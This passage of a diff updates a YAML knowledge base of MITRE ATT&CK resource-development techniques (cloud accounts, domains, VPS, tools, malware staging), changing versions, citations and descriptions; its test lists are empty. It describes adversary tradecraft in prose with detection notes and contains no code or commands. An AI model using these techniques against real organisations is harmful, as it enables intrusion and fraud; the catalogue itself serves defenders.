+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -53752,10 +54415,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -53763,9 +54435,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -53816,11 +54487,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -53833,7 +54503,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -53868,22 +54538,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -53904,7 +54577,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -53943,6 +54616,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53998,7 +54675,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -54056,7 +54732,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -54136,7 +54811,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -54196,7 +54870,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -54218,7 +54891,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -54237,42 +54910,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -54281,22 +54922,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -54310,7 +54982,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -54397,11 +55069,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -54461,7 +55132,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -54503,7 +55173,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -54518,7 +55188,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -54609,11 +55278,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -54646,15 +55314,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -54738,7 +55407,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -54792,7 +55460,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -54843,36 +55510,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54881,21 +55522,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -54941,17 +55608,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -54977,7 +55643,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -55009,8 +55675,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -55037,7 +55701,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -55061,8 +55725,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -55088,7 +55750,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -55122,8 +55784,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -55171,7 +55831,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
